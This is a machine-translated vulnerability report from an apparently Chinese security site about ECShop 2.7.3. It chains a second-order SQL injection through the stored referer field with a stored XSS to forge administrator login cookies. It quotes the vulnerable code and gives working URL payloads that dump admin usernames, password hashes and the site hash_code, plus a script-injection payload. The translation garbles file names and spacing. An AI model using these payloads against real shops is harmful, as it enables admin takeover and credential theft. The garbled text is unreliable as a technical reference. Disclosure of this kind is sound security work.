ecshop the latest version of the SQL injection+stored XSS=any administrator login-vulnerability warning-the black bar safety net

ID MYHACK58:62201340083
Type myhack58
Reporter blue
Modified 2013-08-05T00:00:00


Brief description:

A function of the point ofSQL injectionand storageXSS, containing a variety of tips, I think I'm just a artist to

Detailed description:

Just under ecshop V2. 7. 3 version to

  1. The vulnerability exists in the outside the station advertising statistical functions(corresponding to the management background of the reports and Statistics->Station put in JS), i.e./BOINC. php page, The from parameter(the website source of referer)stored in the database table ecs_adsense, while in the background of the“outside the station put in JS”is read out is not filtered and enter the sql statement, resulting in secondary injection.

/affiche.php 1 1 9 row

$sql = "INSERT INTO" . $ecs->table('adsense') . "(from_ad, referer, clicks) VALUES ('-1', '" . $site_name. "', '1')"; //$site_name i.e.$_GET['from']stored in the library.

/admin/adsense.php 4 7-4 9 rows

/ Get the current ads produced by the total number of orders /

$sql2 = 'SELECT COUNT(order_id) FROM' .$ ecs->table('order_info'). "WHERE from_ad='$rows[ad_id]' AND referer='$rows[referer]'"; //as you can see, not again addslashes lead injection

$rows['order_num'] = $db->getOne($sql2);

  1. At the same time, the output is not to a field referer filtering, resulting in storageXSS.

  2. StorageXSSto get the cookie already can login to the backend, but I How can so simple? SQL injectionthe two get ecs_shop_config in the hash_code and the Administrator's username+password, generate their own COOKIES wouldn't it be more cool?

/admin/privilege.php 1 3 6-1 4 1 rows

if (isset($_POST['remember']))


$time = gmtime ()+ 3600 * 24 * 365;

setcookie('ECSCP[admin_id]', $row['user_id'], $time);

setcookie('ECSCP[admin_pass]', md5($row['password'] . $_CFG['hash_code']), $time);


Vulnerability proof:

http://localhost/test/ecshop/BOINC. php? from=a. baidu. com'%20and%2 0 1=2%20union%20select%20group_concat(user_id,'|',user_name,'|',password)%20from%20ecs_admin_user%20order%20by%2 0 1%20desc%2 3&ad_id=-1 //injection to obtain administrator information

http://localhost/test/ecshop/BOINC. php? from=a. baidu. com'%20and%2 0 1=2%20union%20select%2 0%20value%20FROM%2 0ecs_shop_config%20WHERE%20code%2 0=%2 0'hash_code'%20order%20by%2 0 1%20desc%2 3&ad_id=-1 //inject much hash_code

http://localhost/test/ecshop/BOINC. php? from=a. baidu. com%3Cscript%3Ealert(1)%3C/script%3E&ad_id=-1 //XSS is, of course, I used toxsser. me to obtain the information on the page

Repair solutions:

addslashes, when the output of the filter